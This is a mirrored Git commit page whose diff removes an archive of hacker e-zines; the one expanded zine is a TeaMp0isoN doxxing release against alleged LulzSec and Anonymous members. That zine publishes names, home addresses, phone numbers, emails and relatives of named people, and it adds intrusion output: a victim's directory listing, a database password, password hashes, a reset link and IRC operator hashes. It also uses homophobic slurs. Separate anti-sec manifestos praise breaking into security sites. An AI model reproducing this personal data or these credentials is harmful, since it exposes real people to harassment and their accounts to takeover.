Mirrors/Zines
1
0
Fork 0
mirror of https://github.com/fdiskyou/Zines.git synced 2025-03-09 00:00:00 +01:00
Code Issues Releases Wiki Activity

cleanup

Browse source
This commit is contained in:
Rui Reis 2017-08-09 08:37:15 +01:00
parent 9694692b62
commit 593bda186f
85 changed files with 0 additions and 311994 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

BIN
29a/29a-1.zip
View file

Binary file not shown.

BIN
29a/29a-2.zip
View file

Binary file not shown.

BIN
29a/29a-3.zip
View file

Binary file not shown.

BIN
29a/29a-4.zip
View file

Binary file not shown.

BIN
29a/29a-4s.zip
View file

Binary file not shown.

BIN
29a/29a-5.zip
View file

Binary file not shown.

BIN
29a/29a-6.zip
View file

Binary file not shown.

BIN
29a/29a-7.zip
View file

Binary file not shown.

BIN
29a/29a-7fe.zip
View file

Binary file not shown.

BIN
29a/29a-8.zip
View file

Binary file not shown.

3
29a/README.md
View file

@ -1,3 +0,0 @@
# 29a
* http://vxheaven.org/29a/

2709
Insecurity/apT-28.txt
View file

File diff suppressed because it is too large Load diff

10795
TeaMp0isoN/TeaMp0isoN 1.txt
View file

File diff suppressed because it is too large Load diff

526
TeaMp0isoN/TeaMp0isoN 2.txt
View file

@ -1,526 +0,0 @@
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
######## ######## ### ## ## ######## ##### #### ###### ####### ## ##
## ## ## ## ### ### ## ## ## ## ## ## ## ## ## ### ##
## ## ## ## #### #### ## ## ## ## ## ## ## ## #### ##
## ###### ## ## ## ### ## ######## ## ## ## ###### ## ## ## ## ##
## ## ######### ## ## ## ## ## ## ## ## ## ## ####
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ###
## ######## ## ## ## ## ## ##### #### ###### ####### ## ##
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
********************************************************************************************
/////////////////;-- Zine : lulzsec & Anonymous get teh infamous TeaMp0isoN Treatment///
/////////////////;-- Author : TriCk aka Saywhat? [ TeaMp0isoN ]///////////////////////////
/////////////////***** Before Reading this Zine you Must understand:////////////////////////
/////////////////////* Anonymous and Lulzsec are NOT Hackers////////////////////////////////
/////////////////////* Anonymous did NOT hack Mastercard////////////////////////////////////
/////////////////////* Lulzsec did NOT hack Sony, US Senate, UK ATM or FoxNews//////////////
/////////////////////* Lulzsec ARE Script Kiddies///////////////////////////////////////////
/////////////////////* Anonymous are Scene Faggotz//////////////////////////////////////////
/////////////////////* if you do not understand these five simple points you wont understand
/////////////////////* this zine - if you understand you may continue ; - enjoy.////////////
============================================================================================
********************************************************************************************
say HAI to teh Anonymous & Lulzsec faggotz;
. -- .
( )
( (/oo\) )
( \''/ ) WW
( \/ ) wwwwww /__\
( ) w"ww ww"w | oo | _WWWWW_
( ) W o""o W (o)(o) (|_()_|) / o o \ (+)(+)
oo ( )W ______ W w" "w \__/ (| __O__ |)/ \
w"()"w ( ) "w \_\/_/ w" W -====- W /|\/|\ \ \___/ / \ -==- /
W -==- W ' -- ' ww""wwwwww""ww "w w" |||||||| /-------\ \ /
"wwww" = = |||||||||||| w""""""""""w |||||||||=========| <\/\/\/>
w" "w = = ||||||||||||W W|||||||||=========| / \
tflow topiary sabu JoePie91 power2all kayla owen
### #####
###### # # ##### # # #### ###### ##### # # # #
# # # # # # # # # # # # ## ##
##### ## # # # # #### ##### # # ##### # ## #
# ## ##### # # # # # # # # #
# # # # # # # # # # # # # # #
###### # # # ### #### ###### ##### ##### # #
### ###
###### # # # # # ###### [ FullExposure; Lulzsec&Anon ]
# # # # # # #
##### # # # # # #
# # # # # # #
# # # # # # #
# ### ### ###### ######
========================================
_ __ _
| |_ / _| | _____ __
| __| |_| |/ _ \ \ /\ / / - lulzsec
| |_| _| | (_) \ V V /
\__|_| |_|\___/ \_/\_/
######################################
# Personal Information #
######################################
# Suliaman Saleh #
# #
# 91 Blandford Street #
# W1U 8AF #
# London #
# #
# +44.7772041093 #
######################################
#########################################################################
# Email & Blogs/Sites #
#########################################################################
# kornar123@gmail.com #
# #
# http://www.facebook.com/profile.php?id=100001235310387 #
# https://foursquare.com/user/8919518 #
# http://en.gravatar.com/kornar #
# http://vimeo.com/user5953234 #
#########################################################################
#########################################################################
# Facebook Information #
#########################################################################
# { #
# "id": "100001235310387", #
# "name": "Solomon Saleh", #
# "first_name": "Solomon", #
# "last_name": "Saleh", #
# "link": "http://www.facebook.com/dormitree", #
# "username": "dormitree", #
# "gender": "male", #
# "locale": "en_GB" #
# } #
#########################################################################
#########################################################################
# Family Information #
#########################################################################
# Ahmad Saleh - http://www.facebook.com/profile.php?id=100001245045419 #
# Abdullah Saleh - http://www.facebook.com/profile.php?id=610350249 #
# Fatima Saleh #
#########################################################################
========================================
_ _
| | (_)
| |_ ___ _ __ _ __ _ _ __ _ _
| __/ _ \| '_ \| |/ _` | '__| | | | - lulzsec
| || (_) | |_) | | (_| | | | |_| |
\__\___/| .__/|_|\__,_|_| \__, |
| | __/ |
|_| |___/
######################################
# Personal Information #
######################################
# Daniel Ackerman Sandberg #
# DOB: 13-August-1988 #
# Sweden, #
# Uppsala #
######################################
#########################################################################
# Email - Blogs/Forums - Social Networking #
#########################################################################
# http://www.facebook.com/ManofWorld #
# warpstonelord@hotmail.com #
# zeldauniverse.net #
# http://www.youtube.com/user/warpstonelord #
# http://digg.com/warpstonelord #
# http://twitter.com/atopiary #
#########################################################################
___ _ _
|__ \ | | | - AnonOPS Founder
_ __ _____ _____ _ __ ) |__ _| | | - loves anime p0rn
| '_ \ / _ \ \ /\ / / _ \ '__/ // _` | | |
| |_) | (_) \ V V / __/ | / /| (_| | | |
| .__/ \___/ \_/\_/ \___|_||____\__,_|_|_|
| |
|_|
######################################
# Personal Information #
######################################
# Jasper Lingers #
# +31.613312577 #
# #
# Dokter Boomstraat 68 #
# Oostzaan, NOORD-HOLLAND 1511VE #
# NL #
######################################
#########################################################################
# Email & Blogs #
#########################################################################
# http://www.anirena.com/phpinfo.php #
# http://ddrnl.com #
# power2all@gmail.com #
# soundcloud.com/power2all #
# youtube.com/fagottron #
#########################################################################
_____ _
/ ____| | |
| (___ __ _| |__ _ _
\___ \ / _` | '_ \| | | | - lulzsec
____) | (_| | |_) | |_| |
|_____/ \__,_|_.__/ \__,_|
######################################
# Personal Information #
######################################
# Hector Xavier Montsegur #
# New York #
######################################
#########################################################################
# Email & Blogs #
#########################################################################
# sabu@pure-elite.org #
# xavier@pure-elite.org #
# http://twitter.com/#!/anonymouSabu #
# prvt.org #
#########################################################################
_ _____ _ ___ __
| | | __ (_) / _ \/_ | - Anonymous & Lulzsec
| | ___ ___| |__) | __| (_) || | - we owned this niqqa hard
_ | |/ _ \ / _ \ ___/ |/ _ \__, || | now he denies being lulzsec,
| |__| | (_) | __/ | | | __/ / / | | bitch ass niqqa shud stick
\____/ \___/ \___|_| |_|\___|/_/ |_| to gay anal sex.
[03:26] TriCk: i heard ur gay, is it true?
[03:27] Sven: yes
[03:27] TriCk: does it make u hard knowing another male was in your box looking at ur files?
[03:28] Meebo Message: Sven is offline
######################################
# Personal Information #
######################################
# Sven Slootweg #
# #
# +31 0626519955 #
# Address: #
# Wijnstraat 211 - #
# Dordrecht - #
# Zuid-Holland - #
# 2807GL #
######################################
Dear Sven Slootweg,
We have received your password change request.
This email contains the information that you need to
change your password.
username: joepie91
Please click this link:
https://www.dynadot.com/reset.html?param=H7b8uM7V8K9ES6xJ6Ir7Rk848f6gQ6pbb6ap8c9FD7K6I6x829J9O8n7J8k7i7w9E6t7Z
Feel free to contact us at accounts@dynadot.com if you require further assistance.
Best Regards,
Dynadot Staff
(account joepie91)
------------------------------------------------------------------
------------------------------------------------------------------
$ cat /home/svensl/.lastlogin
77.168.157.177
$ finger svensl
Login: svensl Name: (null)
Directory: /home/svensl Shell: /usr/local/cpanel/bin/noshell
Last login Sun Nov 21 19:01 2010 (CET) on pts/0 from s5591051d.adsl.wanadoo.nl
No mail.
No Plan.
------------------------------------------------------------------
drwxr-x--- 32 svensl nobody 4.0K Jun 12 05:13 ./
drwx--x--x 17 svensl svensl 4.0K Mar 29 01:05 ../
-rw-r--r-- 1 svensl svensl 76 Aug 20 2009 .htaccess
-rw-r--r-- 1 svensl svensl 3.1M Oct 12 2009 3D-demo.mp3
-rw-r--r-- 1 svensl svensl 817K May 9 2009 143CANON.rar
-rw-r--r-- 1 svensl svensl 647 Feb 7 2009 404.shtml
-rw-r--r-- 1 svensl svensl 56K Feb 11 2009 PostClientExample.rar
drwxr-xr-x 3 svensl svensl 4.0K Nov 13 2009 a320/
drwxr-xr-x 2 svensl svensl 4.0K Jun 12 05:14 ajaxdemo/
drwxr-xr-x 2 svensl svensl 4.0K Jun 7 2009 anonym/
-rw-r--r-- 1 svensl svensl 4.5M Jun 7 2010 backup2.sql
-rw-r--r-- 1 svensl svensl 6.2M Oct 12 2009 barbershop.mp3
-rw-r--r-- 1 svensl svensl 5.6M Mar 30 02:32 bitcoin.rar
drwxr-xr-x 7 svensl svensl 4.0K Jun 20 22:12 blog/
-rw-r--r-- 1 svensl svensl 18K Mar 10 2010 blog.png
drwxr-xr-x 3 svensl svensl 4.0K Jan 3 15:57 bob/
-rw-r--r-- 1 svensl svensl 80 Feb 25 19:22 bot.html
-rw-r--r-- 1 svensl svensl 1.1M May 9 2009 canon.zip
drwxr-xr-x 2 svensl svensl 4.0K Feb 3 2009 cgi-bin/
drwxr-xr-x 15 svensl svensl 4.0K Feb 5 01:53 clients/
-rw-r--r-- 1 svensl svensl 4.5K Dec 8 2010 crawler.tar.gz
drwxr-xr-x 8 svensl svensl 4.0K Nov 22 2010 cultuur2010/
drwxr-xr-x 2 svensl svensl 4.0K Oct 24 2010 derp/
drwxr-xr-x 2 svensl svensl 4.0K Mar 5 2009 dev/
-rw-r--r-- 1 svensl svensl 9.0M May 17 2010 dingoo.flv
drwxr-xr-x 3 svensl svensl 4.0K Apr 8 2010 downloads/
-rw-r--r-- 1 svensl svensl 23K Mar 10 2010 downloads.png
-rw-r--r-- 1 svensl svensl 110 Aug 20 2009 dpcalc.html
drwxr-xr-x 3 svensl svensl 4.0K Oct 3 2009 dxgrid/
-rw-r--r-- 1 svensl svensl 2.3K Oct 3 2009 dxgrid.php
drwxr-xr-x 3 svensl svensl 4.0K Jun 22 2009 elements/
-rw-r--r-- 1 svensl svensl 988K Jun 21 2009 elements.rar
-rw-r--r-- 1 svensl svensl 1.7K Jun 7 2010 error_log
-rw-r--r-- 1 svensl svensl 24K Sep 3 2009 exchange.exe
drwxr-xr-x 3 svensl svensl 4.0K Mar 17 12:20 groupware/
-rw-r--r-- 1 svensl svensl 171K Apr 26 2009 groupwareguide.pdf
-rw-r--r-- 1 svensl svensl 275K Mar 29 22:15 id.zip
drwxr-xr-x 33 svensl svensl 4.0K Apr 20 2009 ijs/
-rw-r--r-- 1 svensl svensl 5.2M Jul 3 2009 ijsbr3.zip
drwxr-xr-x 6 svensl svensl 4.0K Sep 17 2009 ijsbreker/
-rw-r--r-- 1 svensl svensl 9.3M May 7 2009 ijsbreker.zip
-rw-r--r-- 1 svensl svensl 4.0M May 7 2009 ijsbreker1.pdf
-rw-r--r-- 1 svensl svensl 5.5M May 12 2009 ijsbreker1c.pdf
-rw-r--r-- 1 svensl svensl 5.6M May 12 2009 ijsbreker_2_final.pdf
drwxr-xr-x 2 svensl svensl 4.0K May 21 2009 images/
-rw-r--r-- 1 svensl svensl 1.9K Mar 10 2010 index.html.bak
-rw-r--r-- 1 svensl svensl 8.0K Dec 20 2009 index.html.old
-rw-r--r-- 1 svensl svensl 2.9K May 8 2010 index.php
-rw-r--r-- 1 svensl svensl 2.0K Mar 10 2010 index2.html
-rw-r--r-- 1 svensl svensl 19 Apr 20 2009 info.php
drwxr-xr-x 2 svensl svensl 4.0K Jun 23 2009 iran/
-rw-r--r-- 1 svensl svensl 12K Mar 10 2010 logo.png
-rw-r--r-- 1 svensl svensl 1.9M Oct 12 2009 matchbox.mp3
-rw-r--r-- 1 svensl svensl 263 May 8 2009 meebo.html
-rw-r--r-- 1 svensl svensl 136K Dec 17 2009 metro1.jpg
-rw-r--r-- 1 svensl svensl 168K Dec 17 2009 metro2.jpg
drwxr-xr-x 3 svensl svensl 4.0K Aug 31 2009 new/
drwxr-xr-x 3 svensl svensl 4.0K Sep 1 2009 new2/
-rw-r--r-- 1 svensl svensl 1.2M May 9 2009 nieuwfoto.zip
-rw-r--r-- 1 svensl svensl 132K Oct 29 2009 notulen1.gif
-rw-r--r-- 1 svensl svensl 56 Oct 5 2009 opslaan_in_powersim.bat
drwxr-xr-x 4 svensl svensl 4.0K Sep 28 2009 photo/
drwxr-xr-x 2 svensl svensl 4.0K Dec 6 2009 playlist/
drwxr-xr-x 2 svensl svensl 4.0K Oct 6 2009 powersim/
-rw-r--r-- 1 svensl svensl 200 Oct 5 2009 powersim.zip
-rw-r--r-- 1 svensl svensl 183 Sep 19 2009 proxy.php
-rw-r--r-- 1 svensl svensl 5.8M Apr 11 2010 record_sdf.avi
-rw-r--r-- 1 svensl svensl 18K Mar 27 03:30 regextester.exe
-rw-r--r-- 1 svensl svensl 636 Jul 10 2009 rooster.php
drwxr-xr-x 2 svensl svensl 4.0K Dec 7 2009 school/
drwxr-xr-x 2 svensl svensl 4.0K Aug 20 2009 schooltools/
drwxr-xr-x 2 svensl svensl 4.0K Mar 8 2010 sdf/
-rw-r--r-- 1 svensl svensl 1.5K Sep 6 2009 setsig.php
drwxr-xr-x 7 svensl svensl 4.0K Mar 17 13:21 shop/
-rw-r--r-- 1 svensl svensl 805K Dec 6 2010 slide02.mp3
-rw-r--r-- 1 svensl svensl 2.0M Apr 1 2010 smallres.ogg
-rw-r--r-- 1 svensl svensl 357K Jun 6 2010 sql.tar.gz
-rw-r--r-- 1 svensl svensl 140K Feb 3 2009 svensl.png
-rw-r--r-- 1 svensl svensl 334 Sep 3 2009 sysinf.php
-rw-r--r-- 1 svensl svensl 1006K Feb 3 2009 testdata.txt
-rw-r--r-- 1 svensl svensl 4.5K Jul 12 2009 unrealircd.conf
drwxr-xr-x 8 svensl svensl 4.0K Aug 11 2009 vakantie2009/
drwxr-xr-x 2 svensl svensl 4.0K Dec 7 2010 wikileaks/
-rw-r--r-- 1 svensl svensl 1.5K Jun 7 2010 wp-config.chocolate
-rw-r--r-- 1 svensl svensl 30K Feb 26 2009 xisto.exe
drwxr-xr-x 2 svensl svensl 4.0K Aug 20 2009 ytdl/
-rw-r--r-- 1 svensl svensl 11K Mar 10 2010 yunicc.png
-rw-r--r-- 1 svensl svensl 3.6M Oct 25 2009 _pma.tar.gz
------------------------------------------------------------------
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'svensl_blog');
/** MySQL database username */
define('DB_USER', 'svensl_blog');
/** MySQL database password */
define('DB_PASSWORD', 'loekie65536');
------------------------------------------------------------------
ijsbreker:$1$ZNitH8Mi$xr/0.tGwEYbmARjbOCH8r1:14285::::::
webmaster:$1$l9tXTjdk$0Q0qHLDjIT5A7midbzcpZ/:14285::::::
dsflash:$1$x8X4K3cj$WkpY4Yu6e8421O2ogPyFD0:14313::::::
info:$1$qiiCOtrD$3B2vV5WV08kQf0nwF/dnj/:14385::::::
howneypowt:$1$m72mrEau$eTLepHhdSXkXqMVBXHXw31:14386::::::
------------------------------------------------------------------
------------------------------------------------------------------
------------------------------------------------------------------
___ .__ __. ______ .__ __. ______ .______ _______.
/ \ | \ | | / __ \ | \ | | / __ \ | _ \ / |
/ ^ \ | \| | | | | | | \| | | | | | | |_) | | (----`
/ /_\ \ | . ` | | | | | | . ` | | | | | | ___/ \ \
/ _____ \ | |\ | | `--' | | |\ | | `--' | | | .----) |
/__/ \__\ |__| \__| \______/ |__| \__| \______/ | _| |_______/
<MLT> TeaMp0isoN
=== #antisec Message to channel blocked and opers notified (spam)
;- Blocked "TeaMp0isoN" from AnonOPS IRC rumad?!?!?!?!? -;
----- end result:
# Default Standard Configs
<admin name="AnonOps" nick="AnonOps" email="AnonOps">
<power hash="sha256" diepass="b6c46fa6b571640dfbe0def52907d65a5bc8720398f43149e2e9f9979b874ae9" restartpass="b6c46fa6b571640dfbe0def52907d65a5bc8720398f43149e2e9f9979b874ae9">
------------------------------------------------------------------
AnonOPS.li IRC OPERS/Admins:
{
Nick:
power2all
Password (Sha256):
e6275286066acd1939ee617fd8481903b5de5b3573d00835481db7024f8cc488 };
------------------------------------------------------------------
{
Nick:
blergh
Password (Sha256):
3d4d9b2cb337d118773729b69c9182f604a3345fe2e705b0c9cc56bef6795ff8 };
------------------------------------------------------------------
{
Nick:
owen
Password (Sha256):
b7539d8a81fc26faae0fdc24b917eccea628839a90727296c109bb409d8a7698 };
------------------------------------------------------------------
{
Nick:
JoePie91
Password (Sha256):
ae014c0819adabb1cd3ca1a07be71cdca20bf26157e0d7e6fd5f0ba5a7b61f65 };
------------------------------------------------------------------
{
Nick:
jaychow
Password (Sha256):
1b20f963c90dea19a0320b66a992e9466074f36cb59e14e160ca99529385f514 };
------------------------------------------------------------------
{
Nick:
shitstorm
Password (Sha256):
1ff201b771c37956f986b53da2f411f9851cd582ac45fdc9bb9767ce964f40ab };
------------------------------------------------------------------
{
Nick:
Isis
Password (Sha256):
c763798826f33309e1b63ee332315eab6659d4125df4feb879107a9a2bf3e813 };
------------------------------------------------------------------
{
Nick:
Riotday
Password (Sha256):
a5552b67127c55dec171ef937bfb32216447d3b56a9df350e4d8a05872f6cf32 };
------------------------------------------------------------------
{
Nick:
evilworks
Password (Sha256):
de6aa46e32dddb16ee9ca06f14450c71dd2ea7b9d7b98be9f1e2a4f19c72e9a2 };
------------------------------------------------------------------
{
Nick:
Cody
Password (Sha256):
514ecb74c5c3fe000457b7833013ba6f5a42573190019c8bf9042145e0d4630e };
------------------------------------------------------------------
{
Nick:
Sharpie
Password (Sha256):
ccae8159528577aeeca12fa7965809a69c45a864e50490992faf7fd1f6b0ddcc };
------------------------------------------------------------------
#Mibbit Blocks
<module name="m_cgiirc.so">
<cgihost type="webirc" password="gQhsUKatbEMPruwFqjm" mask="64.62.228.82">
<cgihost type="webirc" password="gQhsUKatbEMPruwFqjm" mask="207.192.75.252">
<cgihost type="webirc" password="gQhsUKatbEMPruwFqjm" mask="78.129.202.38">
<cgihost type="webirc" password="gQhsUKatbEMPruwFqjm" mask="109.169.29.95">
<cgihost type="webirc" password="aED5dgfdd46fsjfs5E" mask="88.191.130.138">
------------------------------------------------------------------
# # ####### # # # ###### ####### # # ####### #######
# # # # # # # # # # # ## # # # #
# # # # # # # # # # # # # # # # #
# # # # # # # ###### ##### # # # # # #
# # # # # ####### # # # # # # # # #
# # # # # # # # # # # ## # # #
# ####### ##### # # # # ####### # # ####### #
# # # ####### # # # # # # ####### # # #####
# # ## # # # ## # # # ## ## # # # # # #
# # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # #####
####### # # # # # # # # # # # # # # # #
# # # ## # # # ## # # # # # # # # #
# # # # ####### # # # # # ####### ##### #####
Y88b d88P .d88888b. 888 888 d8888 8888888b. 8888888888
Y88b d88P d88P" "Y88b 888 888 d88888 888 Y88b 888
Y88o88P 888 888 888 888 d88P888 888 888 888
Y888P 888 888 888 888 d88P 888 888 d88P 8888888
888 888 888 888 888 d88P 888 8888888P" 888
888 888 888 888 888 d88P 888 888 T88b 888
888 Y88b. .d88P Y88b. .d88P d8888888888 888 T88b 888
888 "Y88888P" "Y88888P" d88P 888 888 T88b 8888888888
888b 888 .d88888b. 88888888888
8888b 888 d88P" "Y88b 888
88888b 888 888 888 888
888Y88b 888 888 888 888
888 Y88b888 888 888 888
888 Y88888 888 888 888
888 Y8888 Y88b. .d88P 888
888 Y888 "Y88888P" 888
888 8888888888 .d8888b. 8888888 .d88888b. 888b 888
888 888 d88P Y88b 888 d88P" "Y88b 8888b 888
888 888 888 888 888 888 888 88888b 888
888 8888888 888 888 888 888 888Y88b 888
888 888 888 88888 888 888 888 888 Y88b888
888 888 888 888 888 888 888 888 Y88888
888 888 Y88b d88P 888 Y88b. .d88P 888 Y8888
88888888 8888888888 "Y8888P88 8888888 "Y88888P" 888 Y888
_ _ _ ___ __ ______ ___________ _ _ _____ __ _______ _ _
| | | | | | \ \ / / | _ \_ _| _ \ \ | |_ _| \ \ / / _ | | | |
| | | | |_| |\ V / | | | | | | | | | | \| | | | \ V /| | | | | | |
| |/\| | _ | \ / | | | | | | | | | | . ` | | | \ / | | | | | | |
\ /\ / | | | | | | |/ / _| |_| |/ /| |\ | | | | | \ \_/ / |_| |
\/ \/\_| |_/ \_/ |___/ \___/|___/ \_| \_/ \_/ \_/ \___/ \___/
_______ ________ _____ _____ _____ _ _ _____ ___
| ___\ \ / /| ___ \ ___/ __ \_ _| | | | / ___|__ \
| |__ \ V / | |_/ / |__ | / \/ | | | | | \ `--. ) |
| __| / \ | __/| __|| | | | | | | |`--. \ / /
| |___/ /^\ \| | | |___| \__/\ | | | |_| /\__/ /|_|
\____/\/ \/\_| \____/ \____/ \_/ \___/\____/ (_)
;- TeaMp0isoN: - TriCk - iN^SanE - Hex00010 - MLT -;
----------------------------------------------------
Twitter:
@TeaMp0isoN_
@_TeaMp0isoN_

39547
ZF0/zf0 2.txt
View file

File diff suppressed because it is too large Load diff

17885
ZF0/zf0 3.txt
View file

File diff suppressed because it is too large Load diff

16852
ZF0/zf0 4.txt
View file

File diff suppressed because it is too large Load diff

29865
ZF0/zf0 5.txt
View file

File diff suppressed because it is too large Load diff

11156
anti-anti-sec/anti-anti-sec.txt
View file

File diff suppressed because one or more lines are too long

8
anti-sec/README.md
View file

@ -1,8 +0,0 @@
On June 30, 2017, I got this on my email:
*We received word that one of your repositories contains sensitive information that you may not have intended to make public such as email addresses, server information and other personal and confidential information of other users:*
*https://github.com/fdiskyou/Zines/blob/master/anti-sec/nowayout.txt*
So... I had to remove the file. Anyway, obviously you can still find it online: https://download.adamas.ai/dlbase/ezines/Anti-Sec/nowayout.txt

136
anti-sec/astalavista-comments.txt
View file

@ -1,136 +0,0 @@
We have all seen the latest anti-sec hacks. We've been reading the comments and wanted to address a few of you.
>> [ ProducedRaw ]
>> I disagree. The guys they are targeting are blackhats and so they chose to be in the line of fire. It's like freaking out over a soldier getting shot.
While you are right about them being in the line of fire by their own will, you
are dead wrong about who these people are. Sometimes we have to remind ourselves
about how ignorant the public is, due in full by the people getting paid to lie.
You will be spared hearing about the long, long history behind hacking. This
stuff is set-in-stone and there's not much people can do to argue for or against
these definitions.
Whitehat: asshole who publicly posts exploits, tools, etc. normally sucks
dick for money (do you actually need a citation or have we shared
enough?)
Greyhat: no such fucking thing
Blackhat: someone who is hacking and not posting shit public. But there's a
HUGE difference between the blackhat hacking scene and the
underground. That's a long story though.
Therefore, it's safe to say that this Astalavista cult and the rest of their
sheep followers (no offense to sheep) are FAR from being blackhats or even
respectable and intelligent "computer scientists" or whatever the fuck they feel
like calling themselves.
Why? Not only do they sit and run ./nmap and think they're badass but they
MIRROR EXPLOITS that are publicly available and sell them. They make a living
off of public and FREE information. They provide little kids with copy-and-paste
tutorials on how to launch attacks with those scripts/tools/exploits too.
But then they offer security solutions to another company... do you see what's
going on here? They cause a problem, and provide (commercially) a fix for it.
Hell, they can't even apply those patches to their own servers!
>> [ illuminatedwax ]
>> See I don't see a problem with getting hacked if people are using 0days on software that you haven't personally created.
>> That's just the way things are. But in this case apparently they stole some passwords from his Gmail account. That's fucking stupid.
You are missing the point. If you're running a security website / company and at
the same time you can't even secure your own god damn workspace, website, or
server and you save plaintext passwords in databases, you deserve to be rm'd.
It doesn't even matter if they were stolen passwords from the gmail account
(they weren't). He should have been much smarter than that. He has an IT CV so
big and a mouth even bigger yet he gets owned. There are no excuses and no
conditions.
>> [ xb4r7x ]
>> lmao... that guy really needs to lay off the caps lock.
>> [EDIT]: I was going to go on an anti-sec rant... but I have a call to go on. Will post when I'm back at my desk.
>> [EDIT2]: Here's my opinion on anti-sec groups. If any of you belong to these groups, which I'm sure at least some of you do...
>> pay close attention to this, then look at yourself in the mirror. You'll thank me later.
>> Black hats are people who sit in their basement on a computer with the lights off with the sole purpose of breaking into systems and causing mayhem.
>> Why? Well nobody really knows... but it's similar to a kid with a magnifying glass near an ant hill.
>> They generally lack social skills and for whatever reason don't want to develop them by going outside and enjoying the world.
>> They take pleasure in other people's pain, and have massive inferiority complexes.
>> This is the main reason they do what they do IMO... they can't make friends like everyone else, feel inferior,
>> and need to prove to themselves that they're better than others. So they break into other people's computer systems to prove that they're better.
>> When really, they're just assholes with no life.
>> There is another type of black hat as well... and they're just sadistic bastards with few redeeming qualities.
>> Dear BH's Make the world a better place... don't try to destroy it just to see what happens. Nothing you've ever done,
>> or ever will do will keep people from living their lives. You're all cockroaches.
>> </rant>
>> In all honesty, you can forget everything I just said...
>> I just have a serious problem with people who fuck with other people for what seems like no reason. Especially when they hide behind the internet.
>> Oh yeah, and they're cry babies. "WAAAHHH DON'T TELL PEOPLE THEIR SHIT IS BROKEN!! THEN THEY'LL FIX IT AND I CAN'T ATTACK THEM ANYMORE!!!" - Idiots
You have the general media image of a "blackhat", carved into your thoughts by
the very people that we've exposed time and time again. The security industry
has no facts to back up on their talk, and nor do you.
Take a good look at the people getting pwned by the blackhats and the
underground. It wasn't this way a long time ago, but you will notice that these
days a good majority are promoting an industry and skewed culture which they
are unable to learn from and apply to their own servers. They are hypocrites.
There is some more terminology that we have to clear up.
Hackers: THEY HACK SHIT. They are not necessarily programmers that broke their
etch-a-sketches apart when they were 5 years old and inhaled the
powder.
Crackers - Reverse engineers, not "hackers who use the information for
destruction".
Anything else is a fucking lie and anyone who believes it is taking it up the
ass by not only the security industry but the whitehats that use stereotypes to
enhance their own image and get them jobs.
Now, when you look at all of the kids running rampant hacking random places with
no skills at all, how are they obtaining the tools to do it? Sites like
Astalavista and people like Glafkos ( nowayout ).
Now do you see why we target these people? It's not about telling people, "your
shit is broken," it is about ZERO DISCLOSURE of exploits to the general public.
If you don't follow that, then you are contributing to the security industry and
making a lot of fucktards money they do not deserve because they obtain it
through lying and scaring people into using their products.
This diagram will help demonstrate:
[ Full-Disclosure ] ----> milw0rm / websites that mirror milw0rm / publish exploits / copy-and-paste tutorials ---> script kiddies with no clue on why / how said script
works,
but they do have a tutorial to follow, line by line ---> companies and people getting hacked / destroyed.
What are blackhats doing exactly?
Hacking and exposing the websites / people who are promoting those exploits to the public, selling a service that they cannot provide, lying and cheating...
Hence why blackhats are against full disclosure Maybe a few good things do happen from full disclosure, but on the bigger picture it's mostly bad.
>> [ xb4r7x ]
>> Idc how much of an idiot the guy was for not securing his data. Hacking his box is still wrong... even if he did ask for it.
>> It bothers me that people do this shit just to prove that they can.
>> Although I was mildly amused that pretty early on in the list of emails they had detected the 'script kiddies'... but still did nothing to keep them out.
If he was your average joe with no security on his data, it would have been all fine, but this guy actually says he is a security expert, his CV mentions 5+ certificates.
This was not to prove they can, but more like to expose those people who claim they are security experts, claim they are whitehats... while it didnt take much effort to
break
into there servers, find exploits, milw0rm mirrors, bad code, etc...
>> [ chia_pet ]
>> Wow. What a bunch of asshats. What's so horrifically wrong about publishing information that could lead to more security?
Read above, you miss the point.. It is not against the security, it is against the security industry.
>> [ benologist ]
>> Who cares if they were profiting? Why are we against everyone but ourselves making money?
It is more about how they were profiting,
disclosing exploits to the public then offering security against the huge threat of "hackers".. while they couldn't secure there own servers / scripts.

1983
anti-sec/astalavista.txt
View file

File diff suppressed because it is too large Load diff

95
anti-sec/imageshack-pwned.txt
View file

@ -1,95 +0,0 @@
__ .__
_____ _____/ |_|__| ______ ____ ____
\__ \ / \ __\ | ______ / ___// __ \_/ ___\
/ __ \| | \ | | | /_____/ \___ \\ ___/\ \___
(____ /___| /__| |__| /____ >\___ >\___ >
\/ \/ \/ \/ \/
Proudly presents...
_ _ _
(_) | | | |
_ _ __ ___ __ _ __ _ ___ ___ | |__ __ _ ___| | __
| | '_ ` _ \ / _` |/ _` |/ _ \' / __| | '_ \ / _` |/ __| |/ /
| | | | | | | (_| | (_| | __/ \__ \ | | | (_| | (__| <
|_|_| |_| |_|\__,_|\__, |\___| |___/ |_| |_|\__,_|\___|_|\_\
__/ |
|___/
Anti-sec. We're a movement dedicated to the eradication of
full-disclosure. We wanted to give everyone an image of what we're all
about.
Full-disclosure is the disclosure of exploits publicly - anywhere. The
security industry uses full-disclosure to profit and develop
scare-tactics to convince people into buying their firewalls,
anti-virus software, and auditing services.
Meanwhile, script kiddies copy and paste these exploits and compile
them, ready to strike any and all vulnerable servers they can get a hold
of. If whitehats were truly about security this stuff would not be
published, not even exploits with silly edits to make them slightly
unusable.
As an added bonus, if publication wasn't enough, these exploits are
mirrored and distributed widely across the Internet with a nice little
advertisement embedded in them for the crew or website which first
exposed the vulnerability to the public.
It's about money. While the world is difficult to change, and money will
certainly continue to be a very important in the eyes of many, our
battle is that of the removal of full-disclosure for the purpose of
making it harder for the security industry to exploit its consequences.
It is our goal that, through mayhem and the destruction of all
exploitive and detrimental communities, companies, and individuals,
full-disclosure will be abandoned and the security industry will be
forced to reform.
How do we plan to achieve this? Through the full and unrelenting,
